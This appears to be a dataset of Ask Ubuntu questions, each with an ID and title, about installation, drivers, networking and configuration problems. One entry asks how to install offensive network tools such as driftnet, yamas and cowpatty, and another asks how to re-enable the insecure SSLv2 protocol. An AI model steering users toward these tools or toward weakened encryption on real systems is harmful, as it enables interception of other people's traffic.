447550	not able to install curl on ubuntu 12.04	when i am trying to install the following error is coming sudo apt-get install php5-curl reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : gedit : breaks : gedit-plugins ( < 2.91 ) but 2.30.0-0ubuntu1 is to be installed php5-curl : depends : php5-common ( = 5.3.10-1ubuntu3.11 ) but 5.3.10-1ubuntu3.10 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . can anyone please highlight the issue and give some solution ?
447551	how do i install hackingtools that are not in repository ?	i tried to follow the instructions here : http : //talk.maemo.org/showthread.php ? t=73572 apt-get install nmap driftnet charon yamas wireshark tshark kismet cleven cowpatty but some packages are not in the ubuntu repository : e : paket charon can not be found . e : paket yamas can not be found . e : paket cleven can not be found . e : paket cowpatty can not be found . how can i install the missing packages with apt-get ?
447554	problem after logging out the sytsem in ubuntu 10.04	i have ubuntu 10.04 installed on my system . 2 users are there me , hduser ( i.e. , hadoop ) . now when i logout of any user the system goes blank . a black screen appears with nothing written on it ? after that i will again restart the system from laptop.any solution ? ? ?
447565	special parameter xforcevesa to the kernel	is possible to know how works the special parameter `` xforcevesa '' when is added to kernel ? how init-scripts can use vesa driver when x start ? this is for educational purposes
447566	dell xps 13 kernel issue	i 've bought dell xps 13 9333 and i 've upgrade to latest ubuntu 13.10 . then i 've realize on book my machine ca n't never end it 's task . it 's just freeze after some time on booking screen ( ubuntu image with dots underneath . then i reazlie if i change to kerenl 3.8 then it 's start working again . but each update i try to use new kernel i 'm going to the same issue . how can i solve this problem ? how can i use latest kernel with my dell xps ?
447567	dual screen problem with optimus	i have a lenovo t430 ( with an optimus graphical system ) , connected to a dock station with an output dvi ( a 23 '' screen is on this output ) . i have ubuntu 14.04 beta 1 . optimus works great with the last nvidia drivers ( nvidia-331 ) and nvidia-prime . with the command : prime-select nvidia i 'm able to use the nvidia card rather than the intel one . note that the dvi port on the dockstation can be used only with the nvidia card ! the dual screen is nearly functional , i have my workspace on the two screens , and when i go in the parameters , i see correctly my two screens . but , if i want to configure a little bit deeper , via nvidia-settings , it sees only the screen on the dvi port . so i can not manage anything , and the problem is : the system thing i have only one screen . when a new window appears , it 's between my two screens . when i `` maximize '' a window , it 's done as if i had only one screen ( so my window uses the two screens ) . i 'm not confident enough to edit xorg.conf or other things by myself , that 's why i need your help . here a screenshot of the screen parameters settings from ubuntu versus nvidia-settings :
447569	trying to import books purchased from audible.com into banshee	i 'm having no luck with this . i can open the audible books in banshee , but i would like to move them to banshee so i can sync them to my ipod nano 3g . is this possible ?
447573	new to ubuntu , experiencing problems	i recently installed ubuntu 12.04 tls . while i took my time and read a lot of stuff to familiarize myself , there are still some problems that are continuing to puzzle me . i installed ubuntu on a partitioned drive ( exactly 20 gb which is more than enough ) using wubi . it asked me how much space i wanted to allocate for ubuntu and i chose 19gb which was max for the size . my problems right now are : 1 ) i installed skype , which i can access and do everything using ubuntu , but ubuntu application manager does not show it on installed apps . searching for skype returns 0 results , while already-installed stuff can be seen . however if i search my system using for `` skype '' it will return with a result . what am i doing wrong ? 2 ) how can i move my installed apps to a different partition ? i am planning to use 20gb just for ubuntu and install the rest of the apps to a different partition of > 150gb i really did not find any clue about these . if it helps i used to be a win7 user thanks in advance
447577	external hdd not showing up when inserted	ok i have a problem with my external hdd not showing up anywhere when i plug it in ! the background information is this ... my internal 120gb hdd was failing to load windows on dual boot with ubuntu , so i deleted everything on the 120 hdd and swapped it round with the 1tb external hdd that i had so now that i have the 1 tb hdd as the internal and the 120 as the external , the new external is somehow not showing up at all . is there a way to get this hdd to show up and mount it so that it can be used ?
447580	downloading files available on a website	my aim is to download only the files available on websites such as those on http : //pelusa.fis.cinvestav.mx/tmatos/lasuma/lasuma2_archivos/numercps/ansi/index.htm under the `` access via directories : '' title . how can i achieve my aim i am not familiar with wget and i do not want to obtain the html files , i would like to download only the *.c and *.h files on that site for example . is it possible ? i think downloading specific file types and saving to a desired place is a function provided by wget .
447584	will the ubuntu replace my windows ?	i 'm going to install ubuntu with windows installer . if i choose c : \ for the drive installation , will the ubuntu replace my windows ? i installed my windows on drive c : \ . thank you ...
447586	how to uninstal a program when graphical mode can not load	i do not know what the grub really is ! ? but from some search i guess that is like widows safe mode . in windows safemode we can go and uninstall some programs which we have installed on windows . is grub has this capability too ? i installed a program last night and now some problems happen and my ubuntu can not load . i want to go grub and uninstall that in order to solve my problem . please bring a example or say which commands i should type ? ( note : i installed one software and becpuse the lack of memory i can not load my ubuntu i wan to remove that to make my hard free )
447587	alt key for hud does n't work	after few of tweakings , i does n't have hud anymore . normally ( on another computer ) : but it does n't appear at all ( on my computer ) : indeed , the alt key call the menu of focused app . so , as the consequences : i ca n't do alt+tab windows switching i ca n't call unity command prompt ( alt+f2 ) note : but i still can call terminal ( ctrl+alt+t ) . my hud service was on : prompt # locate hud | grep usr | grep service /usr/lib/indicator-appmenu/hud-service /usr/share/dbus-1/services/com.canonical.hud.service prompt # i have set hud shortcut again on system settings > keyboard > shortcut > hud and alt l. but the problem still exist . it is annoying problem that does n't solved by just unity -- replace or unity -- reset or by reinstalling indicator-appmenu ( i 've done them all , times ) . i have read some questions about similiar topic but no one same with this . any help will be very appreciated . thank you .
447590	i just wanted to know how to add additional packages to the preseed file ?	i am preparing my preseed file for the unattended installation of ubuntu using a cd iso image . this is the following file : # # # localization d-i debian-installer/locale string en_us # keyboard selection d-i console-setup/ask_detect boolean false d-i keyboard-configuration/layoutcode string us # # # network configuration for cdrom or usb stick only d-i netcfg/choose_interface select auto d-i netcfg/get_hostname string unassigned-hostname d-i netcfg/get_domain string unassigned-domain d-i netcfg/wireless_wep string # # # clock and time zone setup d-i clock-setup/utc boolean true d-i time/zone string us/eastern # # # partitioning d-i partman-auto/method string lvm d-i partman-lvm/confirm boolean true d-i partman-lvm/device_remove_lvm boolean true d-i partman-auto/choose_recipe select atomic d-i partman/confirm_write_new_label boolean true d-i partman/confirm_nooverwrite boolean true d-i partman/choose_partition select finish d-i partman/confirm boolean true d-i partman-lvm/confirm boolean true d-i partman-lvm/confirm_nooverwrite boolean true d-i partman-auto-lvm/guided_size string max # # # account setup d-i passwd/user-fullname string ubuntu user d-i passwd/username string ubuntu d-i passwd/user-password-crypted password $ 1 $ 1aniigaw $ zsucbk840zrkmovivtnep1 d-i user-setup/encrypt-home boolean false # # # apt setup d-i apt-setup/use_mirror boolean false # # # package selection tasksel tasksel/first multiselect ubuntu-desktop d-i pkgsel/updatedb boolean false # # # boot loader installation d-i grub-installer/only_debian boolean true d-i grub-installer/with_other_os boolean true # # # finishing up the installation d-i finish-install/reboot_in_progress note # # # x configuration xserver-xorg xserver-xorg/autodetect_monitor boolean true xserver-xorg xserver-xorg/config/monitor/selection-method \ select medium xserver-xorg xserver-xorg/config/monitor/mode-list \ select 1024x768 @ 60 hz //////////////////////////// thanks in advance
447596	software updater error	i am getting an error in ubuntu as follows and frequent crash report is generated . any help to fix this ? because of this error i am not able to run my software updater . thanks . e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_saucy-updates_universe_i18n_translation-en , e : the package lists or status file could not be parsed or opened . regards pk
447597	orage calendar on xfce/unbuntu	when scheduling a yearly event using the orage calendar on the xfce desktop , what are the steps to follow under the recurrence tab ? when setting a yearly birthday or holiday , after checking advanced complexity and yearly frequency , do i put 1 occurrence and repeat forever ? then do i uncheck all the weekday boxes or leave them all checked ? then do i just check on day of birthday in the month of this year only ? also , if i want it to alert me 4 days ahead of the event using visual alarm only then under the âalarm tabâ , do i just put 4 days before start and check persistent alarm , check orage window and check use notification ?
447598	web-browser with different engines for testing purposes	i know in windows there is lunascape browser available which you can use it as a browser and it has trident , gecko , webkit integrated so you can switch between rendering engines for developing purposes . is there a similar tool in ubuntu ?
447599	wrong page load with local apache on ubuntu 12.04	on /etc/hosts i created a localhost domain called drupaltest . on /home/user/documents i copied my drupaltest backup . on /etc/apache2/sites-available i created a file named drupaltest which points to the directory i created . finally i restarted apache2 . but if i call the drupaltest domain in a browser i got the default apache message 'it works ! ' . other drupal instances i installed run well . except the one i copied . do i have to do addtional things ?
447601	how do i enable sslv2 on openssl	i have tried to enable openssl with sslv2 by downloading the sources , setting the 'enable sslv2 ' options and compiling , as per the instructions here : http : //www.techstacks.com/howto/enable-sslv2-and-tlsv12-in-openssl-101c-on-ubuntu-1304.html the problem is that i can not install my .deb packages without getting into dependency hell . the source files appear to be the version of openssl from before the 'heartbleed ' patch whereas everything else on my updated 13.10 expects the latest 'heartbleed safe ' version . i do n't want to uninstall everything , i just want to install my compiled version of openssl and leave everything else as is .
447605	is there a way to bundle package installations for a new os ?	i use a webdesign development for my desktop and laptop , i also sometimes use vmware . this forces me to install the same packages multiple times to properly set up my webdesign environment . i have to 'sudo apt-get install ' a lot of the same things . i 'm wondering if you can make some sort of installation bundle that i could use for this ? it would be nice if i can keep adding to this for my own use . if anybody can provide me with a resource for this , or maybe an alternative i would be happy .
447606	how to make ubuntu software center work with custom repository ?	i am making a custom ubuntu distribution with custom repository but how to add my repositories to it and can others also upload their packages to my repository
447607	can not decrypt hardrive . password not accepted	i have been tackling this for at least 5 days now . initially i could n't get ubuntu to recognise my already installed partition lvm with an arch , home , and swap logical volume . i have now got ubuntu installed in another logical volume with the help of this guide : how can i install ubuntu encrypted with luks with dual-boot ? here is my partition layout in case it helps going forward : http : //pastebin.com/mumsxsuu i managed to get it to boot yesterday and done the latest updates to 14.04 . after rebooting ubuntu replaced my arch grub ( not intended - i will uninstall ubuntu grub if i can get the system to boot again ) and would not boot the encrypted partition , it would n't accept my password . i used the arch iso to put the arch grub back into place , however this does n't boot either . i have used the old kernel and initramfs ( 3.13.0-19 ) and the new updated one ( 3.13.0-24 ) and neither accept my password . however the same password works to decrypt arch linux . i have tried using the us keyboard ( i know where the differences are to my uk keyboard ) and the password is n't accepted in that form either so it is not due to a us layout now being used . i am at the end here of getting this to work but i am now so close to giving up . i can not see why my password would be rejected . any help would be much appreciated . thank you for even just reading this and any help you may have .
447609	my hardware can handle opengl 3.2 but my system throws error related to the opengl version that my computer supports	i have the following hardware configuration - nvidia corporation gf108m [ geforce gt 525m ] intel corporation 2nd generation core processor family integrated graphics controller according to nvidia 's website ( http : //www.nvidia.in/object/product-geforce-gt-525m-in.html ) , my system supports opengl 4.4 but when i try to run some code from https : //github.com/tomdalling/opengl-series , i get the following error - unable to create opengl context error : glfwopenwindow failed . can your hardware handle opengl 3.2 ? please help . p.s : i am a newbie
447610	can i install ubuntu on a sony vaio sve1511aenb ?	can ubuntu be installed on a sony vaio sve1511aenb ? i am asking this because i tried two times , without succes . i could not get appropriate graphics drivers ; i could not increase or decrease screen brightness , sleeping mode was not working and there were several other problems . also usb connection failed . do i have to install appropriate drivers separately ?
447612	less css and and node js troubles	when i try to install less css compiler under my ubuntu 13.10 box i get following message and lescss do n't working . in what way i can fix the problem ? i execute : sudo npm install -g less after this i get e list with ok messages : npm http 304 https : //registry.npmjs.org/cryptiles npm http 304 https : //registry.npmjs.org/ctype/0.5.2 npm http 304 https : //registry.npmjs.org/combined-stream npm http get https : //registry.npmjs.org/delayed-stream/0.0.5 npm http 304 https : //registry.npmjs.org/sntp npm http 304 https : //registry.npmjs.org/boom npm http 304 https : //registry.npmjs.org/delayed-stream/0.0.5 and list finished with following : /usr/local/bin/lessc - > /usr/local/lib/node_modules/less/bin/lessc less @ 1.7.0 /usr/local/lib/node_modules/less ├── mime @ 1.2.11 ├── mkdirp @ 0.3.5 ├── source-map @ 0.1.33 ( amdefine @ 0.1.0 ) ├── clean-css @ 2.1.8 ( commander @ 2.1.0 ) └── request @ 2.34.0 ( json-stringify-safe @ 5.0.0 , forever-agent @ 0.5.2 , aws-sign2 @ 0.5.0 , qs @ 0.6.6 , tunnel-agent @ 0.3.0 , oauth-sign @ 0.3.0 , node-uuid @ 1.4.1 , tough-cookie @ 0.12.1 , http-signature @ 0.10.0 , hawk @ 1.0.0 , form-data @ 0.1.2 ) after this when i tried the following commands : echo `` @ foo : 25px ; # foobar { font-size : @ foo } ; '' > style.less sudo lessc ./style.less ./style.css i get the following error : /usr/bin/env : node : no such file or directory after i executed ln -s /usr/bin/node /usr/local/bin/nodejs and created symlinks there is no errors but lessc compiler do n't working properly . i have created file to test . it content is : cat style.less @ color : # 4d926f ; # header { color : @ color ; } h2 { color : @ color ; } ` and after trying lessc styles.less > styles.css there is created file - styles.css but the file is empty . i also try commands that i tryed before - see top on the post . but it not working . i would be very grateful for any advice and recommendations . best regards .
447615	how to automatically launch bash shell when opening terminal or in console mode ?	i create a normal user account in ubuntu using `` useradd '' command , but the problem is that i have to type `` bash '' to launch the bash shell for this user account in both the console mode ( in a tty , through ctrl+alt+fn ) and the remote mode ( via ssh ) . the most important part of bash shell for me is the auto-completion function , so my question is that how i could make the bash shell launch automatically when logging into the account . i use ubuntu 13.04 32bit version . i appreciate for any advice !
447617	how to make modprobe ip_conntrack_ftp persist a reboot	sorry if this is a stupid question , but to get outbound active ftp connections through our firewall we need to run the following : sudo modprobe ip_conntrack_ftp i learned this trick from http : //major.io/2007/07/01/active-ftp-connections-through-iptables/ in that article it says to persist it i should add iptables_modules= '' ip_conntrack_ftp '' to /etc/sysconfig/iptables-config but i 'm not sure that is right for ubuntu , should i add ip_conntrack_ftp to the bottom of /etc/modules instead ? thanks .
447622	how to start a service living on a windows partition	i am developing a service on my windows 7 / ubuntu 13.04 dual boot machine . my service lives on an ntfs partition . it is written in java and should work on both platforms . just to make things clear , my linux start script is a bash script . fstab : uuid=e24e8ddc4e8daa3d /media/nelson/data ntfs users , defaults 0 0 /etc/init.d/mql : lrwxrwxrwx 1 root root 80 apr 14 14:15 /etc/init.d/mqld - > /media/nelson/data/linux/nelson/netbeansprojects/coreengine/dist/etc/init.d/mqld* but when i start my service it says : sudo service mqld start mqld : unrecognized service sudo /etc/init.d/mqld start sudo : unable to execute /etc/init.d/mqld : permission denied permission denied , what permission can i be more than root ? edit : the point is , that an executable ( here a bash script ) can not be exceuted as root ( permission denied ) . because of the only reason that the symlink points to a file on a ntfs partition . what can i do to start services on a nfts partition - i.e . different mount options ?
447624	why is particular usb-drive not auto mounted as others are ?	i have a couple of usb-harddrives that i use with my stationary computer , all of them are formatted as ext4 . one single of them does n't automount as all the others do . what can be the reasons for this ? i 've checked the following things without any solution turning up : fsck on the disk there 's no entries for the disk in fstab my user owns the whole drive
447625	broken pipe error forcing to logout	i am getting a broken pipe error and then the login screen shows up . the programs that were running were firefox , nautilus and image viewer . how can i find out what 's causing the error ?
447626	can not boot into ubuntu after logo !	i am ahmad and i am facing trouble created by myself . here is the problem : '' after lubuntu logo appears : a black screen appears with a blinking white '- ' on the top left corner of the screen for infinite time ' . summary to the problem : '' i had another problem before dumping into the mentioned problem . my ubuntu [ initially : changed to lubuntu after installing lxde ] was working superb but suddenly after login again into ubuntu [ unity desktop ] , i noticed my window borders and terminal which were appearing black completely . i searched through the internet and found some solutions and tried one of them [ see below link ] http : //askubuntu.com/questions/36059 ... black-terminal there i saw a solution in which some one told me to install mir through below link : https : //wiki.ubuntu.com/mir/installing i did the same and after installing mir successfully my system rebooted [ at this point everything went planned ] but after booting into ubuntu 13.10 just after lubuntu logo ; a popup came 'saying something like , your pc is running on very low graphics ' and i hit yes to something meaningful which was next popup after this [ i do n't remember what actually was that but all i know that hitting yes would be nicer to me at that point . then above problem raised and screen turned black for long long period and i put the ubuntu off by power button on my machine and now this problem ] . '' p.s . luckily , i already had primary operating system linux mint debian edition [ dual booted with ubuntu 13.10 ] . now i am on linux mint right now but i really wanted ubuntu 13.10 back i have things over ubuntu . furthermore , i had unity and lxde installed on ubuntu 13.10 . my machine is : ubuntu 13.10 [ 365gb ] /dev/sda/sda4 [ secondary ] . linux mint debian edition [ 100gb ] /dev/sda/sda2 [ primary ] . lenovo b570e . intel hd 3000 . core i3-2330m processor . two +points are these too : i can access ubuntu drive though linux mint so may be copy pasting some scripts over ubuntu root directory possible in solving the issue . i have ubuntu live usb ready to boot into ubuntu 13.10 anytime to work over problem ! . thanks for reading this much and commenting ! .
447628	strange screen fragment when using emacs	i am being bothered by the strange screen fragment while using emacs . sometimes , when i edit something in emacs , the screen gets fragmented like this : the lines are not correctly updated below is the correct display my ubuntu is in virtualbox . the virtualbox version is 4.3.10 . i have installed the guest addition . the ubuntu i am using is ubuntu 13.10 intel® core™ i7-2600 cpu @ 3.40ghz × 4 chromium 64-bit the emacs i am using should be the newest one gnu emacs 24.3.1 ( x86_64-pc-linux-gnu , gtk+ version 3.8.6 ) of 2014-01-03 on gold , modified by debian
447629	use xbmc portable	i would like to use xbmc in ubuntu without installing it ( portable ) . under windows it can be done . i tried many things in ubuntu , but none of them worked . i am using ubuntu 13.10 x64 . thx . xbmcuser
447632	alternative to wubi installer ( without cd/usb install )	i 'm using a old computer and i 'm interested in getting linux on it . my computer can not boot from usb or cd . i was presented with wubi but i was just wondering , is there any other way to install ubuntu ( or actually , xubuntu or lubuntu ) on my computer without having to manually repartition and stuff . like have the normal cd/usb install but without a cd/usb ( p.s . i do n't need to dual boot windows and linux )
447637	xfce top panel indicator problem	i 'm using xubuntu 14.04 , 64 bit the output of xfce4-about is xfce4-about-message : no vendor information found in `` /usr/share/xfce4/vendorinfo however i believe i 'm using 4.12 but ... anyway , everything was working fine , until i had an issue , and had to do sudo apt-get install xubuntu-desktop just to be sure that i 'm using the latest version that comes with 14.04 , and not the official version that comes with 13.10 , i upgraded it $ sudo add-apt-repository ppa : xubuntu-dev/xfce-4.10 $ sudo add-apt-repository ppa : xubuntu-dev/xfce-4.12 $ sudo apt-get update $ sudo apt-get dist-upgrade all is fine till today , the top panel is a mess , too many indicators i ca n't remove the bluetooth indicator on the left . i ca n't move any indicator , if i remove any indicator from the panel , the whole panel will be gone . i tried resetting xfce but does not seem to fix it . the output of xfce4-panel is xfce4-panel init : indicator-messages main process ended , respawning init : indicator-bluetooth main process ended , respawning init : indicator-power main process ended , respawning init : indicator-datetime main process ended , respawning init : indicator-application main process ended , respawning init : indicator-sound main process ended , respawning init : indicator-messages main process ended , respawning init : indicator-bluetooth main process ended , respawning init : indicator-power main process ended , respawning init : indicator-datetime main process ended , respawning init : indicator-application main process ended , respawning init : indicator-messages respawning too fast , stopped init : indicator-application respawning too fast , stopped init : indicator-power main process ended , respawning init : indicator-sound main process ended , respawning init : indicator-bluetooth main process ended , respawning init : indicator-datetime respawning too fast , stopped init : indicator-power main process ended , respawning init : indicator-sound respawning too fast , stopped init : indicator-bluetooth main process ended , respawning init : indicator-power main process ended , respawning init : indicator-power main process ended , respawning init : indicator-bluetooth main process ended , respawning init : indicator-power main process ended , respawning init : indicator-bluetooth main process ended , respawning init : indicator-power main process ended , respawning init : indicator-power main process ended , respawning init : indicator-bluetooth main process ended , respawning init : indicator-power main process ended , respawning init : indicator-power respawning too fast , stopped init : indicator-bluetooth main process ended , respawning init : indicator-bluetooth main process ended , respawning init : indicator-bluetooth main process ended , respawning init : indicator-bluetooth respawning too fast , stopped
447638	backspace working without using it	it 's the first time i using ubuntu and i 'm installling the ubuntu-12.04.4-desktop-i386 version . the problem is that wherever i had to type in some info ( like location or rename a drive ) during the installation , the typed characters are removed as if there is somebody using the backspace . this happened every second . first i thought it was a hardware problem , but in dos or windows there is no problem . ( installed after ubuntu ) . what is here the problem ?
447643	cant access ubuntu gui from xen	i have ubuntu server installed on my xen server . now due to some reasons i need to configure some gui based application on ubuntu so for that i installed ubuntu-desktop via apt-get . now when i want use startx , it gives me below error . i am using xen center 's console . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : mon apr 14 14:10:44 2014 ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' fatal server error : no screens found please consult the the x.org foundation support at http : //wiki.x.org for help . please also check the log file at `` /var/log/xorg.0.log '' for additional information . ddxsiggiveup : closing log server terminated with error ( 1 ) . closing log file . xinit : giving up xinit : unable to connect to x server : no such file or directory xinit : server error xord log file , [ 2736.360 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 2736.360 ] compiled for 1.11.3 , module version = 2.3.0 [ 2736.360 ] module class : x.org video driver [ 2736.360 ] abi class : x.org video driver , version 11.0 [ 2736.360 ] ( ii ) unloadmodule : `` vesa '' [ 2736.360 ] ( ii ) unloading vesa [ 2736.360 ] ( ii ) failed to load module `` vesa '' ( already loaded , 32587 ) [ 2736.360 ] ( ii ) loadmodule : `` fbdev '' [ 2736.361 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 2736.361 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 2736.361 ] compiled for 1.11.3 , module version = 0.4.2 [ 2736.361 ] abi class : x.org video driver , version 11.0 [ 2736.361 ] ( ii ) unloadmodule : `` fbdev '' [ 2736.361 ] ( ii ) unloading fbdev [ 2736.361 ] ( ii ) failed to load module `` fbdev '' ( already loaded , 32587 ) [ 2736.361 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 2736.361 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 2736.361 ] ( ++ ) using vt number 8 [ 2736.361 ] ( ww ) xf86openconsole : setsid failed : operation not permitted [ 2736.361 ] ( ww ) falling back to old probe method for vesa [ 2736.361 ] ( ww ) falling back to old probe method for fbdev [ 2736.361 ] ( ii ) loading sub module `` fbdevhw '' [ 2736.361 ] ( ii ) loadmodule : `` fbdevhw '' [ 2736.362 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 2736.362 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 2736.362 ] compiled for 1.11.3 , module version = 0.0.2 [ 2736.362 ] abi class : x.org video driver , version 11.0 [ 2736.362 ] ( ee ) open /dev/fb0 : no such file or directory [ 2736.362 ] ( ee ) no devices detected . [ 2736.362 ] fatal server error : [ 2736.362 ] no screens found
447645	how to change terminal window 's title ?	what i want in order to clearly differentiate the terminal windows , i want to change the title of each terminal window . i do n't want the window title changes when switching tabs . problem by default , terminal window 's title depends on current tab . and i do n't know of a way to change and fixate a window 's title .
447646	unable to connect - apache2 in ubuntu 12.04 virtualhost	i have followed the tutorial from here https : //www.digitalocean.com/community/articles/how-to-set-up-apache-virtual-hosts-on-ubuntu-12-04-lts to set a local website . i just changed the port 80 to 8081 because i have also openstack installed in my system . i am unable to access my website via browser and getting error mozilla browser just shows unable to connect here is my sites-available file contents < virtualhost *:8081 > serveradmin webmaster @ localhost servername cloud documentroot /var/www/cloud/public_html < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory >
447647	how do i save an ssh key passphrase for an unattended process ?	i 've created passphrase protected rsa key . the public key is installed on remote server in authorized_keys in the user 's .ssh directory . from requesting server , i can ssh into the remote server without a problem , but i need to enter passphrase every time i do this . i want to use this key for a munin server to ssh into a munin node and get data , so the procedure fails because of the passphrase . i have thought of two options : remove the passphrase from the key . save the passphrase somewhere , maybe in a configuration file ? is there a better solution ? i think ssh-agent is supposed to do something like this , but i can not find concise information about it .
447649	keyboard and mouse only working after reboot	i 'm currently running 14.04 beta on a lenovo thinkpad twist ( s230u ) . as the os boots into the login screen , the built-in mouse and keyboard are disabled . the touch screen remains active , however . i 've found a way around this : using the touch screen i reboot the system . as it boots for the second time , the keyboard is functional . the mouse however remains inactive until i log in . i 've experienced the same issues on 13.10 . any help is appreciated . thnx !
447654	ubuntu 13.10 kiosk mode with custom session not working	i 've installed ubuntu 13.10 and i 'm trying to enter kiosk mode in chromium right on boot , but nothing is working . i 've been using this method ( http : //nexxylove.tumblr.com/post/22690398464/ubuntu-web-kiosk-in-10-easy-steps ) create ~/.xsession , add the following ; # ! /usr/bin/env bash chromium-browser then when i 'm running startx in terminal , it just refreshes the desktop and chromium does n't pop up . i 've also tried the method with customized session : 1 ) open a file ( gksu gedit /usr/share/xsessions/firefox.desktop ) and paste : [ desktop entry ] name=firefox ( no effects ) comment=this session only opens firefox exec=/usr/bin/firefox -height 1200 -width 1600 icon= type=application but it does n't work either . when i click on this file , chrome ( i 've changed the names ) pops up . what am i doing wrong ? i 've spent almost 3 hours on this , trying to resolve it , followed many tutorials . ok , figured it out . i created /.xsessionrc instead of .xsession and now it works flawlessly .
447657	net-snmp-create-v3-user : not found	i 'm having a hard time adding a user to smpd v3 . the following command : net-snmp-config -- create-snmpv3-user -a < mypass > < myuser > ends up with a /usr/bin/net-snmp-config : 236 : /usr/bin/net-snmp-config : net-snmp-create-v3-user : not found error . snmpd , libsmp-dev , libsmp-base are all at the newest available versions 5.7.2 . ubuntu version : 13.10 server
447661	fglrx brightness and black screen	in a hp 2000 notebook pc and ubuntu 13.10 , when i change the radeon driver for the fglrx , glxgears show more fps , but any brightness change make a black screen for one second . with the radeon driver works ok , but with less fps . other detail is that glxinfo shows fglrx_pci as driver , but the details window show vesa : hondo any solution ?
447662	invalid efi file dualboot windows 8 and ubuntu	i have installed ubuntu with windows 8 and now i am getting errors as : invalid efi file.. please help me solving this problem . i tried to repair using boot repair but am getting an error there as well . this is the report generated using boot repair .
447663	port usage in openvpn on ubuntu precise	i 'm using openvpn to setup a vpn server on a desktop with the client on a laptop also using openvpn . both machines are ubuntu precise desktop . all that i want to do is to access website securely when away from home . i 've followed the ubuntu community guide for openvpn on a ubuntu server . both pcs tun0 setup . i 've opened port 1143 on the 'server ' ( i.e . the desktop ) for input & output using gufw . extract from server.conf : # which tcp/udp port should openvpn listen on ? # if you want to run multiple openvpn instances # on the same machine , use a different port # number for each one . you will need to # open up this port on your firewall . port 1194 # tcp or udp server ? ; proto tcp proto udp however , the server 's /var/log/syslog shows : apr 14 06:39:48 johndesktop kernel : [ 1123.668448 ] [ ufw block ] in=eth0 out= mac=50 : e5:49:15:57:52:2c : b0:5d:2d : f4:75:08:00 src=31.55.166.187 dst=192.168.101.12 len=40 tos=0x00 prec=0x00 ttl=57 id=0 df proto=tcp spt=443 dpt=60916 window=0 res=0x00 rst urgp=0 i do n't understand where the tcp for 443 comes from . also , tcp for 443 on the server is already open ! please explain .
447667	windows 7 share mounted but not visible in the files app or in places	i successfully edited my fstab file to permanently mount a windows 7 share . however , i was having problems writing to the share . i initially thought it was due to permissions on the mount point folder ... so i tried chmoding the folder to no effect . so , i created a new folder as a mount point and changed the fstab entry . using sudo mount -a did n't refresh the old mount to the new mount ( i changed the name , but the name of the old mount was still appearing ) . so , i used sudo umount sharename which cleared the old mount but the new mount did n't appear in its place . so , i navigated to the new mount point and i see that all the files are there ... and i can write to the windows share from ubuntu no problem ... i create a file and it appears on my win 7 box . however , the mount is not showing in my files app or on the desktop ( like the previous one did ) . it shows up when i run the mount command . i 'm at a loss ! ! ! has it somehow remembered the umount and is refusing to show it ? any thoughts would be appreciated . here 's myfstab line : //192.168.0.100/share /mnt/share cifs username= '' xxxx '' , password= '' xxxxx '' , iocharset=utf8 , file_mode=0777 , dir_mode=0777 0 0
447668	web page loading problem on realtek semiconductor rtl8168/8111 pci-e gigabit ethernet nic	i have a problem with my network ( realtek semiconductor rtl8168/8111 pci-e gigabit ethernet nic ) on kubuntu ( live cd ) . i wanted to install kubuntu , so i tested the web browser using the live cd , but facebook , youtube , and others sites are not displayed properly ! how i resolve this problem ?
447673	how to change number of workspaces from command line ?	i 'd like to change org.compiz.profiles.unity.plugins.core - > hsize and - > vsize from command line . i thought i could use gsettings set org.compiz.profiles.unity.plugins.core vsize 4 but then i 've got an error message : no such schema 'org.compiz.profiles.unity.plugins.core' is it possible at all ? the setting can be clearly seen , as on the attached screenshot .
447675	index.php is downloading instead of displaying	i have set a local website from following here , i have followed everything as it is but when i access my site via mozilla browser , it asks me where to download and save instead of displaying the index.php any solution ?
447676	although permissions are correct , getting `` permission denied ''	when login in i get /etc/bash_completion.d/gzip : permission denied /etc/bash_completion.d/resolvconf : permission denied i login and sudo to root . then i see similar errors when i try to run executables in /usr/sbin & /usr/local/bin . all permissions look correct but when i check with `` file '' command i see '' executable , regular file , no read permissions '' i stress all files have correct permissions e.g 755 . for example sudo su - /usr/sbin/service postfix status returns -su : /usr/sbin/service : permission denied anyone seen this before , or offer any assistance , please ?
